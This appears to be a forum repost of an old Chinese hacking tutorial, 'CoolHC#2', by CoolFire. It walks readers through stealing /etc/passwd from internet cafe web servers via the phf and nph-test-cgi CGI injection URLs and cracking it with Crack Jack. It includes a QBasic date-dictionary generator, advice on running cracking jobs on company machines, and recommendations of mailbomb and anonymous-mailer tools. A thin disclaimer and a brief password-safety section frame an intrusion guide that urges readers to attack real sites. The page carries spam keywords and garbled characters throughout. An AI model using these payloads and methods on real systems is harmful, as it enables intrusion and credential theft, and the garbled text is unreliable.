久久综合伊人噜噜色,日本三级香港三级人妇电影精品,亚洲中文色资源,国产高清一区二区三区人妖

      <small id="r7w9x"></small>

          <td id="r7w9x"></td><sub id="r7w9x"><menu id="r7w9x"><samp id="r7w9x"></samp></menu></sub>
        2. 

          4. <th id="r7w9x"></th>
          1. 

            汶上信息港
            
標(biāo)題: 如何破解系統(tǒng)(2) [打印本頁]
            

            
作者: 雜七雜八    時(shí)間: 2011-1-12 16:25
            
標(biāo)題: 如何破解系統(tǒng)(2)
            這不是一個(gè)教學(xué)文件, 只是告訴你該如何破解系統(tǒng),好讓你能夠?qū)⒆约旱南到y(tǒng)作安全的保護(hù), 如果你能夠?qū)⑦@份文件完全看完, 你就能夠知道電腦駭客們是如何入侵你的電腦, 我是 CoolFire, 寫這篇文章的目的是要讓大家明白電腦安全的重要性, 并不是教人 Crack Password若有人因此文件導(dǎo)致惡意入侵別人的電腦或網(wǎng)路, 本人概不負(fù)責(zé) !!
            
% y7 S0 C, l" L- }0 w' j
            
% J9 ^1 `3 x- I8 h( G3 p話說上次 CoolFire 講到許多的 Net Coffee 店, 安全性之差實(shí)在是沒話說,但是過了這麼久也不見有幾家改進(jìn), 可能是想讓自己的電腦被別人玩弄在股掌之間吧, 但可不是每個(gè)人都像CoolFire這樣溫和, 如果遇到的是比較狠一點(diǎn)的角色, 那你的 Net Coffee 可能要有一兩天只賣Coffee 而沒辦法再 Net 下去了!!
            
; A1 h4 i7 Y/ y+ h, ]
            
0 {7 v/ R: s2 q+ A- {( |3 U  c6 ]繼 CoolHC#1 推出後, 有許多人是否已經(jīng)躍躍愈試了呢 ?? 這次咱們不談新的花招,用用之前所講的再來探險(xiǎn)一番, 當(dāng)然, 這一次我照往例還是不會(huì)使用真正的 Domain Name 來作教學(xué),但是課程中的所有內(nèi)容絕對(duì)屬實(shí), 當(dāng)然本次攻擊的對(duì)象還是.... Net Coffee Shop....& E: l- L/ [- @: r' S" ]
            

            
" V/ }8 Y  R" r" _0 Q! A  f$ P**談一下 Crack Jack 猜猜密碼! C! K- t' g# Y+ L* D2 j# }  y
            

            
2 f* ^$ {! A  L. K& a/ f- k許多人從上一次介紹 Crack Jack 之後就應(yīng)該已經(jīng)領(lǐng)教過它的功力了,但是有幾點(diǎn)需要說明的, , C1 s$ X3 B! `* u* t0 ~
            
有些人使用 Jack 來幫你尋找 password, 我就當(dāng)你已經(jīng)抓到了沒有 shadow 的 /etc/passwd, 
            
. K9 |; F" k0 a5 v4 l1 B4 i0 ^9 Q但是為甚麼使用 Jack 還是找不到呢?? 我想你應(yīng)該要換個(gè)正點(diǎn)一點(diǎn)的字典檔了, 因?yàn)镴ack 還
            
4 x; Z7 g5 m! M! V$ i是根據(jù)你所提供的字典檔在尋找, 如果你提供的字典本身就沒有這些字,那當(dāng)然連一個(gè)小小帳號(hào)6 N+ d' r! v* L2 t! v
            
的密碼你都別想猜到了. 數(shù)一下你所使用的字典檔中有多少字 ???我用的字典檔有十九萬多個(gè)# c0 H; k" y  \# @8 `2 P! M& |
            
字, 你的呢? 是不是小巫見大巫呀 ?? 那麼就趕快充實(shí)一下字典檔再重新尋找吧 !!
            
# W( R. v/ T( L& i: @
            
/ G! u6 F9 g* z+ Q; _7 s) y許多人的密碼都有一定的法則, 我自己寫了 PaSs2DiC 就是將 UserName 由passwd檔轉(zhuǎn)成字典檔的工具, 這是對(duì)一些喜歡使用 UserName 當(dāng)作 Password 的人最好的方式,但是也曾經(jīng)好運(yùn)的找到別人的密碼, 真不曉得"甲"是不是暗戀"乙"才用"乙"的 ID 作為密碼的 ???你可以很簡(jiǎn)單的使用Qbasic 來制作 "序數(shù)" 密碼, 或日期密碼, 底下簡(jiǎn)單的作一個(gè) 0101 (一月一日) 到
            
0 b5 x0 y5 W% S3 H  L5 w  F0 L1231 的密碼" _( \- j2 T9 Z* k" W) g* }% l
            
檔出來:
            
6 \  x, B; @4 H3 T# i------------Cut Here MakeDate.BAS -------------------( o' m5 A' ], [1 [' m/ c* {  d
            
Open "Dates" for output as #1! N4 `9 X3 P. A: ?
            
for I=1 to 12; X0 A. f( F( q% G2 j5 {5 D
            
for J=1 to 31$ H% ?1 a0 u9 Z! V0 f$ E7 {
            
I1$=rtrim$(ltrim$str$(I)))1 M7 F4 x; [7 I$ g  R6 v% S3 |- `
            
J1$=rtrim$(ltrim$str$(J)))
            
* J* Y9 E: c5 V* Mif len(I1$)=1 then I1$="0"+I1$
            
! j  ]/ d* s. X2 Pif len(J1$)=1 then J1$="0"+J1$  W/ n' t7 I4 l3 r9 R$ w
            
Out$=I1$+J1$$ h/ Q5 T# h7 O2 u6 i2 w
            
print #1,Out$ ) V1 g- X4 d  A- N
            
next I  Q% p9 s# F& ]- a5 N8 z
            
next J! L1 V/ l( Z9 \0 p6 x3 S$ A1 O
            
close
            
# q& v" [+ _" l5 f; O$ T------------ Cut Here End MakeDate.BAS ----------------
            
# `4 M3 m7 ]3 L' k' r5 O% P! K& W這支小程式將會(huì)寫一個(gè) "DATES" 的檔案, 里面就是你要的字典, 當(dāng)然啦,這只是包含月跟日 !! 9 K# ?+ P8 F$ F" ^; d8 I0 Y$ {
            
如果你要猜的密碼是含年份的, 你可能要再增加一些程式碼, 再 Run 一次試試看了,不過這是一個(gè)好的開始不是嗎 ??- u- {( m* P9 `* l
            
) c9 g3 C5 ~; \* R
            
**如何保護(hù)自己的密碼7 x: E% e# K1 l" M' J. e
            

            
" E0 w& f, T& M: q7 A! a* _' Q談了這麼多的密碼猜法, 當(dāng)然要談一下如何保護(hù)自己的密碼不被破解,4 C- _& j* J+ x& D1 e+ N/ _: D
            
請(qǐng)遵守以下的原則:  [1]不用生日作為密碼(太容易猜了啦) [2]不用序數(shù)作為密碼(除非你的序數(shù)無限大)7 }( L  n! v0 H5 d% {' H! S
            
[3]不用身份證字號(hào)作為密碼(LetMeIn! 里有猜身份證字號(hào)的功能耶)
            
9 f' v2 M" Y; z0 H" ~" V[4]不用在字典中查得到的字作為密碼. 
            
! V$ e: g; |) M6 y* [
            
6 D  D: X/ V6 c+ \0 Q" t3 ]那麼依照上面的幾點(diǎn)說法, 甚麼樣子的密碼最不容易猜, 自己也最好記呢?? 答案是:用一句有意義的話來作為自己的密碼, 例如: NoOneCanCrackIt 就是一個(gè)很難猜的密碼類型,基於這個(gè)密碼猜法的原則, 你的密碼是不是要作些更新, 或是大小寫要作一些對(duì)調(diào) ?? 如果你的密碼是1 C! J8 A% y, a, e6 U3 x: {4 Z- ?
            
coolfire,
            
% d. E) W9 N( }5 a建議你最好能改成 CoolFire 或 coolfires (加復(fù)數(shù) "s"),& q& R+ V- {; ?% k$ f0 N' |
            
這樣被猜中的機(jī)率就小了很多. 如果你是一個(gè) Hacker, 你的密碼也被人猜中的話... 那...#%%^^^&@
            
7 `/ I* }! H8 D8 O- k( A* X: J" }8 g+ c7 n) J$ J0 `, J( F, e
            
**正式的話題" m0 g. J/ k9 w1 k. n
            
" N9 G1 k. R, R2 {# Z) T) r0 @
            
這次的話題當(dāng)然還是 Crack, 相信許多人已經(jīng)看過 CoolHC#1 了,當(dāng)然眼尖的人可能也已經(jīng) D/L4 H7 ^( \* P5 i* O
            
System Holes 試過了, 你有成功的例子嗎 ?? 如果沒有, 這份 CoolHC#2可能就是你的強(qiáng)心針,
            
0 B6 b7 `( p3 M0 C) ?. l因?yàn)檫@次談的正是 System Holes #1 成功的案例.Step 1. 連線到 "蕃薯藤" 找 "網(wǎng)路咖啡" 找到好多家網(wǎng)路咖啡的 WWW 網(wǎng)址,一一連上去試試看) M- Y  l6 U4 y4 q( k, G
            
在 System Holes #1 中的方法可不可行.
            
& D; \- i1 n' k8 d" b; NStep 2. 若可行則會(huì)傳回 /etc/passwd 資訊, 存檔後迅速 Logout, 使用 Crack Jack( \, n! U5 W4 {6 y* H
            
解讀!!6 J  D' Y, M% f4 i! M' R/ a
            

            
: `* O2 c& {' g0 L: G( `[[實(shí)例探討]]: j2 ]7 D5 e+ ]: P- T* j
            

            
& |! c$ u2 H6 w4 b+ V) LSystem Holes #1 中所介紹的 WWW 入侵法是這樣子的:
            
2 G: B3 T/ c! a2 [' ^& uhttp://www.somewhere.com/cgi-bin/nph-test-cgi?* 後再" s& W5 \, S/ o
            
http://www.somewhere.com/cgi-bin/phf?Qalias=x%0aless%/20/etc/passwd
            
( M8 b: X! E" J6 l) X& h3 z1 j- [7 F. q& j9 q4 @, [7 q# N
            
[1] 用 WWW Browser 連到 yournet.net
            
% Q1 l+ p( K3 C# n# N* c[2] Location 輸入 --> "www.yournet.net/cgi-bin/nph-test-cgi?*"6 |& {2 E3 q& ^5 {( J8 L- l
            
[3] 接著如果出來一份像 Report 的畫面的話, 接著輸入
            
/ I' `/ ~6 L% l5 T. E3 l8 R/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd
            
4 s3 w8 K; Q9 r, A' r[4] 發(fā)生了甚麼事?? etc/passwd 在你的瀏覽器中 "顯示" 出來了 !! 快點(diǎn) Save 吧& j6 f0 z# t4 \) I1 l
            
!!
            
& t5 r7 P: A: R8 d8 J( x
            
$ }) T  p& ^* W- c9 |% n" J$ q& k這個(gè)方法所用的是系統(tǒng) "檢索" 的漏洞, 不提供這個(gè)功能,或是伺服器檢索類型不同的機(jī)器則不- W9 t5 E( s; h' D+ M
            
會(huì)接受這樣的指令, 當(dāng)然也就逃過我們這次的模擬演練啦 !! 但是.... 相信我,你一定會(huì)找到一家脫線的網(wǎng)路咖啡, 并沒有像我們一樣每天閱讀 Mail List 的信,對(duì)系統(tǒng)安全一點(diǎn)研究也沒有的人不在少數(shù). http://hacker.welcome.com 就是這樣的一個(gè) Net Coffee Shop...呵.... 快來試試吧 !! - J# H- S  g) l' _# M. T  \
            
! a2 N9 h% V! C; f8 i
            
當(dāng) CoolFire 抓到 /etc/passwd 後, 立刻存檔, 也馬上斷線, 并且拿出 UltraEdit來瞧一下使用者的資訊, 當(dāng)然這個(gè)小 passwd 對(duì) Crack Jack 來說, 實(shí)在是不夠看,沒幾分鐘就在我的 486 機(jī)器上顯示出來幾個(gè)以 UserName 作為 Password 的資訊 (歸功於 PaSs2DiC 及CrackJack 的功勞)不過當(dāng)我試著找尋 root 的密碼時(shí), 一想到我那將近 20 萬字的字典檔,就想到可能花費(fèi)的時(shí)間一定相當(dāng)?shù)捏@人, 於是就以 Jack 的 Option 設(shè)定只尋找 root 那一行, ...(過了良久)... 果不然又是一個(gè)笨 root. 用了 "非常" 容易猜的密碼... <--- This is JackAss... 呵!! Got It!% ]& U- p- r/ ^7 N& N0 F6 t
            

            
0 l9 ]7 z5 i6 `) @7 i# E9 ^, e* f如果你所使用的機(jī)器速度不是頂快, 你最好能夠到快一點(diǎn)的機(jī)器上使用 Crack Jack,不然你也可以將字典檔切割成幾個(gè)小檔案, 然後再分別在幾臺(tái)機(jī)器上跑, 我目前使用的配備是486DX4-13032MB RAM, 3.2GB HDD, 近 20 萬字的字典檔, 如果在分析較大的 passwd檔時(shí)我會(huì)將字典檔切割為四至五個(gè)小檔 (看有多少臺(tái)機(jī)器可跑),然後在周末下班前在公司的幾臺(tái)機(jī)器上分別執(zhí)行 Crack Jack, 等到禮拜一上班時(shí)就等著接收成果了! 當(dāng)然如果你只有一臺(tái)機(jī)器, passwd檔又很大的話,由於 Crack Jack 無法於 Windoz 95 下使用, 你可能只能犧升時(shí)間或機(jī)器來跑了!再?zèng)]有辦法的話, 亦可使用單機(jī)多工, 多開幾個(gè) DOS Box 來跑 Brute, 也許也是一個(gè)可行的辦法!
            
' e6 a  g+ ^- J% |5 M1 O0 P$ a' ]) ]
            
3 u, D9 I( o! A**後語! D3 u, U0 G3 v  Q
            
! o  o9 L. U' [4 {8 o; G6 y0 M
            
有許多人在使用 Crack Jack 的時(shí)候有許多問題, 不過看了 CoolHC#1 應(yīng)該都解決了吧?? 最近大家問的比較多的是 UpYours 3.0, 雖然已經(jīng)改進(jìn)了 Install 的問題,不過大家的問題還是都出在Winsck.ocx 上面, 有人說裝了 MSICP Beta 會(huì)好 ?? 但也有實(shí)例裝了也還不能 Run 的,
            
0 Z+ R' J5 B* G+ p* d# Y0 Q6 B' S; q" @在此建議大家不要再玩 MailBomb 了, 雖然我喜歡收集這種東西, 但還是少亂炸為妙,已經(jīng)證實(shí)有許多常用的 MailBomb 沒有辦法 Fake IP 了 !! 所以... 如果 UpYours 3.0裝不起來的人就試試 KaBoom!V3.0 吧 ! 雖然沒有辦法 Fake IP (選錯(cuò) Mail Server 的話), 但是也是一個(gè)不錯(cuò)的AnonyMailer如果要發(fā)匿名信, 現(xiàn)在首頁上有可以幫你發(fā)信的 Mailer, 會(huì)安全一點(diǎn). 
            
+ }" ^' n. P6 `7 M
            
0 a  m$ n% Z8 \4 }2 W+ c如果你仍舊對(duì) UpYours 3.0 不死心, 就試試 ResSvr32.exe (Under Windows/systemrectory),
            
# L6 }( P9 R$ r! q/ O. r8 Q% D看看能不能將 WinSck.ocx 裝上了... 記得先 UnReg 再 Reg... 2 ^$ v; w" ]9 U5 w2 ^2 n
            

            
3 S# s! p0 s( w2 Z4 \在此建議大家可以多訂閱一些 "系統(tǒng)安全" 討論的 Mail List或多參考一些已經(jīng)被找出來的系統(tǒng)漏洞, 因?yàn)橛行┤藢?duì)這些方面并不是很重視, 所以這些資訊也就顯得格外的重要了,如果能夠多參考一些資訊, 在你入侵的時(shí)候會(huì)有很大的幫助, 當(dāng)然, 如果你能作出一份列表出來,放在手邊參考的話, 就可以快速的; 安全的入侵了!! 下一次所談的是 SendMail 的 Bug 實(shí)例,在這中間當(dāng)然照往例會(huì)先出一份 System Holes #2 來作為資料. 如果有興趣的人在 SH#2出來的時(shí)候可以先研究看看. 下次見! Merry X'Mas..... & Happy New Year.......0 P3 h! G2 P5 n4 U9 T( ~: g
            
4 J/ M) r% w+ f9 J7 P
            
------
            
$ h: I% n0 o2 `! h7 f上次講的 Home Page 建置案還沒搞完, 沒有充實(shí)一下 Home Page 實(shí)在是對(duì)不起大家,所以利用一點(diǎn)時(shí)間寫了 CoolHC#2, 可能報(bào)告又交不出來了 !! 老話,如果你有興趣寫其它程式的中文說明, 請(qǐng)完成後寄一份給我, 我將它放在 Home Page 上面讓其它人參考,當(dāng)然你也可以給我你的使用心得, 讓別人參考看看也行! 目前準(zhǔn)備收集一系列的 System Hole List,如果你在其它的站臺(tái)有看到的, 請(qǐng)把它先 Cut 下來, Mail 一份給我 ! 2 D& r1 `. S# y2 J1 U  g
            
: s) d: \! K9 h! D3 s- m
            
------# T$ O8 p! _( f4 w* Z
            
再次重申, Crack 別人站臺(tái)之後不要破壞別人站臺(tái)中的資料, 此篇文章僅作為教育目的,不主張你隨便入侵他人主機(jī).... (高-Net 還是除外)... 請(qǐng)勿將這類技術(shù)使用於破壞上 (又...如果第三次世界大戰(zhàn)開打, 你可以任意破壞敵國的電腦網(wǎng)路... 我全力支持),最嚴(yán)重的情況(如果你真的很討厭該主機(jī)的話)... 就將它 Shut Down.... 好了! 別太暴力了!
            
" Q4 |- l( g$ O8 p6 X5 S
            
7 k  i; `+ W/ H* _4 G                             
            
% ^7 e) G, l2 B% X, z: c+ ~! {




            

            

            歡迎光臨 汶上信息港 (http://m.junkejituan.com/)

Powered by Discuz! X3.5